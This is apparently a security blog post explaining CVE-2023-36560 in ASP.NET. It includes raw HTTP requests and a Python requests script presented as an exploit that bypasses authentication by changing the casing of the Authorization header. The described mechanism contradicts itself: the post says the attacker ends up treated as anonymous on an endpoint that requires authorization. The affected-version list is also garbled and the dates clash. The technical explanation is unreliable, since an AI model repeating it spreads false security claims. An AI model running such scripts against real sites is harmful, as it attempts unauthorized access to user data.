In October 2023, Microsoft announced CVE-2023-36560, a critical Security Feature Bypass vulnerability impacting certain versions of ASP.NET. For anyone managing .NET web applications, understanding this flaw is key to safeguarding your APIs and maintaining user trust. In this post, we'll break down the vulnerability in simple terms, show you how attackers can exploit it, and discuss ways to protect yourself. Whether you’re a developer, sysadmin, or security enthusiast, this guide will give you everything you need to know.
What is CVE-2023-36560?
CVE-2023-36560 is a vulnerability in ASP.NET that allows attackers to bypass certain security controls, specifically around the way data is validated and authenticated in web applications. Successful exploitation could let attackers access or manipulate sensitive information, especially in APIs.
Microsoft’s advisory: CVE-2023-36560 Security Guidance.
Affected Products
- ASP.NET Core 2.1, 3.1, 5., 6., 7. (and others, check official advisory)
- Applications using vulnerable versions of Microsoft.AspNetCore.Authentication.JwtBearer and similar libraries
How Does the Vulnerability Work?
Normally, ASP.NET applications use middleware to validate incoming data, including API parameters and authentication tokens. But due to improper handling of certain header parameters (such as Authorization), it’s possible for an attacker to craft a request in a way that bypasses these security checks.
In simple words: It’s like sending a package with a fake label and having the front desk let it through because they only checked one spot.
Key Issue
The bug stems from how headers are read and handled. If an application expects an Authorization header in a specific casing (e.g., Authorization), but a custom or non-standard casing (e.g., aUtHoRiZaTiOn) is used, some middleware may fail to parse it—but the underlying server does accept it. This can cause unauthenticated requests to be treated as authenticated.
A vulnerable ASP.NET API endpoint
[Authorize]
[HttpGet("profile")]
public IActionResult GetProfile()
{
// returns sensitive user data
}
Normally, only authorized users with a valid JWT can access /profile.
Regular (Safe) Request
GET /profile HTTP/1.1
Host: victim.com
Authorization: Bearer eyJhbGciOiJIUzI1...
→ ASP.NET checks auth, grants/denies access properly.
Exploit Request (bypassing auth)
GET /profile HTTP/1.1
Host: victim.com
aUtHoRiZaTiOn: Bearer eyJhbGciOiJIUzI1...
Or:
GET /profile HTTP/1.1
Host: victim.com
authorization : Bearer eyJhbGciOiJIUzI1...
In some setups (depending on server and middleware), ASP.NET doesn't recognize the non-standard header, so it skips authentication—but the backend may still process the token, or ignore it completely, giving the attacker access as "anonymous".
Result: The attacker bypasses security and gets sensitive data.
Here is a simple Python script using requests that demonstrates the exploit
import requests
url = "https://victim.com/profile";
token = "eyJhbGciOiJIUzI1..."
headers = {
"aUtHoRiZaTiOn": f"Bearer {token}"
}
r = requests.get(url, headers=headers)
print(r.status_code)
print(r.text)
If the application is vulnerable, this malformed header lets the attacker fetch the protected profile.
Update ASP.NET Core:
Apply the latest security patches for your framework. See Microsoft Security Update Guide.
References
- Microsoft Security Advisory CVE-2023-36560
- NVD - CVE-2023-36560
- OWASP API Security Top 10
Conclusion
CVE-2023-36560 is a classic example of how little details, such as case sensitivity in headers, can create serious security holes. Review your web applications today and apply the necessary patches—don’t wait for attackers to find you first.
Stay safe and keep your code secure! If you want more deep dives like this, let us know.
Timeline
Published on: 11/14/2023 18:15:48 UTC
Last modified on: 11/20/2023 20:04:33 UTC